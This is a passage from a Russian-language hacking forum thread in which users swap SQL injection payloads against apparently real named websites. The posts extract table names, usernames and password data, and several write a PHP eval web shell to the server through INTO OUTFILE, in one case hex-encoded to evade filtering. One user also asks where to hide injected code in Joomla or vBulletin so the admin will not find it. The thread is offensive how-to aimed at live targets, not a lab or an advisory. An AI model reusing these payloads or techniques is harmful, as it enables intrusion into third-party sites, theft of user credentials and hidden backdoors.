Старый 11.03.2012, 16:12   #1811
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Для демонстрационных целей получения доступа обычно оказывается проще сначала подумать над сценарием импровизированной атаки, а потом уже пробовать атаки для каждой найденной уязвимости.

Для внердения операторов СУБД, обычно, проверяется возможность записи ФС с целью выполнения команд уровня ОС с правами пользователя веб-сервера.
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 11.03.2012, 17:08   #1812
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

durito, а мне кажется, что это особенности запроса. Думаю в таких случаях юзать подзапросы, а в главном запросе оставить information_schema. Шаблон таков:
Цитата:
-1+union+select+1,(SELECT+password+FROM+user+LIMIT+ 0,1),3+from+information_schema.columns--+f
UPD.
Pashka,
на ачат зайди. Там много php-инъекции. Выбери старые(тогда VPN юзать не придется) и не пофиксенные(саму собой ).
Ereeee вне форума   Ответить с цитированием
Старый 12.03.2012, 23:13   #1813
a10nE
 
Регистрация: 31.10.2011
Сообщений: 10
Репутация: 0
По умолчанию

Привет, раскрутил скулю, но не могу понять как залить шелл.
Цитата:
script.php/id/-126' and 1=3 union select 1,2,3,4,concat_ws(0x3a,user,password,file_priv),6, 7,8,9,10,11,12,13,14,15,16 from mysql.user%20--%20
Выводит соответственно юзера, пасс, file_priv Y.
Пытаюсь залить шелл:
Цитата:
script.php/id/-126' and 1=3 union select 1,2,3,4,'<?@eval($_GET[e]);?>',6,7,8,9,10,11,12,13,14,15,16 from mysql.user into outfile+'/home/www/site.org/s.php'%20--%20
Выдает ошибку:
Цитата:
1109 - Unknown table 'pd' in field list
select pd.language_id, p.products_id, pd.products_name, pd.products_description from products p, products_description pd where p.products_id = '-126' and 1=3 union select 1,2,3,4,'<' and pd.products_id = '-126' and 1=3 union select 1,2,3,4,'<' and pd.language_id ='4'
Пожалуйста, ткните носом, что я делаю не так.
И второй вопрос - есть у меня логин и пасс рутового мускул-юзера. Как приконектиться к базе? Пробовал через пых, но не получается, коннект не проходит.
PHP код:
$dbcnx mysql_connect'site.org''login''password' ); 
Заранее спасибо.
__________________
http://pix.am/G0fb.png
a10nE вне форума   Ответить с цитированием
Старый 12.03.2012, 23:46   #1814
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

Цитата:
Сообщение от a10nE Посмотреть сообщение
Пожалуйста, ткните носом, что я делаю не так.
очевидно же, ? надо заурленкодить
Andrey1800 вне форума   Ответить с цитированием
Старый 13.03.2012, 14:01   #1815
FliP
 
Регистрация: 09.08.2010
Сообщений: 19
Репутация: -1
По умолчанию

Цитата:
Сообщение от FliP Посмотреть сообщение
нужен совет,фильтруется concat,group_concat и все скобки
как ещё можно вывести инфу,чтобы соответствовала логин:пасс?
Код:
http://eafangames.com/live_score_tennis.php/flash_games_online.php?channel=76%27%29+union+select+table_name%20from%20information_schema.tables--+f
просто если через лимит выводить,то логин:пасс не схожи
есть ещё ответы как можно осуществить?
__________________
/home/jbdr/data/www/stopxaker.ru/includes/init.php
FliP вне форума   Ответить с цитированием
Старый 13.03.2012, 17:36   #1816
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Цитата:
И второй вопрос - есть у меня логин и пасс рутового мускул-юзера. Как приконектиться к базе?
Для начала взять любой ман по мускулю и познать, что в командной строке\терминале:
Код:
mysql --host=site.org --user=myname --password=mypass mydb
Судя по тому, что ты в качестве хоста указываешь site.org, подключаешься к мускулю из внешней сети. А по дефолту он настроен принимать подключения только с локалки. Мб тот самый случай... да 80% наверное таких.

По заливке... как вариант
Код:
script.php/id/-126' and 1=3 union select 1,2,3,4,unhex(0x3c3f406576616c28245f4745545b655d293b3f3e),6,7,8,9,10,11,12,13,14,15,16 from mysql.user into outfile+'/home/www/site.org/s.php'%20--%20
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 13.03.2012, 17:47   #1817
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

еще одна гиморная скуль выносит мне мозг

Цитата:
https://secure.natural-friends.com/freeprofilesearch.aspx?gender=Female&agefrom=25&ag eto=85&height=&country=&starsign=&memberno=&profil ekeywords=&county=1%27+or+1=(SELECT+TOP+1+TABLE_NA ME+FROM+INFORMATION_SCHEMA.TABLES)---
получаем имя первой таблицы

но вот подзапросы уже не проходят:
Цитата:
1+OR+1=(select+top+1+table_name+from+information_s chema.tables+where+table_name+not+in+(select+top+2 +table_name+from+information_schema.tables))--
стандартный вариант перебора таблиц и полей тоже

Цитата:
1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='table_name'+AND+C OLUMN_NAME+NOT+IN+('column'))--
зачаренные имена таблиц и полей тоже не проходят.


в сообщении об ошибке есть интересная мне таблица и поля,

MI_Members.Member_ID
MI_Members.Member_Username
MI_Members.Member_Gender

но вот поля с паролем и мылом я не нашел

Цитата:
https://secure.natural-friends.com/freeprofilesearch.aspx?gender=Female&agefrom=25&ag eto=85&height=&country=&starsign=&memberno=&profil ekeywords=&county=1%27+or+1=%28SELECT+TOP+1+quoten ame%28COUNT%28*%29%29+from+MI_Members%29--
количество юзеров выяснил, вывод из известных мне таблиц есть

Цитата:
https://secure.natural-friends.com/freeprofilesearch.aspx?gender=Female&agefrom=25&ag eto=85&height=&country=&starsign=&memberno=&profil ekeywords=&county=1%27+or+1=%28SELECT+TOP+1+quoten ame%28Member_Gender%2Bchar%2858%29%2BMember_Userna me%29+from+MI_Members%29--
кто подскажет как найти нужные таблицы, пробовал руками подставлять, бесполезно
durito вне форума   Ответить с цитированием
Старый 13.03.2012, 19:34   #1818
Paul Kaplan
 
Аватар для Paul Kaplan
 
Регистрация: 10.10.2011
Сообщений: 2
Репутация: 0
По умолчанию

Столкнулся с такой проблемой.

Необходимо в движок joomla и vbulletin заинклудить свой код,
результаты работы которого покажутся на странице. (вывод ссылок)

Вопросы:
Какие скрипты в этих движках отвечают за формирование и отдачу страницы?
И куда лучше вписать инклуд, чтобы админу сложнее было найти?

Заранее спасибо.
Paul Kaplan вне форума   Ответить с цитированием
Старый 13.03.2012, 20:07   #1819
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
как запрос составить полностью без пробелов? убрать около лимита его. на ачате мне сей секрет рассказывать не хотят.

Paul Kaplan, в жумле отредактирую активный шаблон как html.
в vb — в меню модулей, не помню как называется
faza02 вне форума   Ответить с цитированием
Старый 13.03.2012, 20:09   #1820
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 354
Репутация: 105
По умолчанию

Paul Kaplan вопросы по инклуду Сапы и прочей фигни задавайте на форуме Сапы: http://forum.sape.ru/forumdisplay.php?f=26 такой херней тут мало кто страдает =)
b3 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot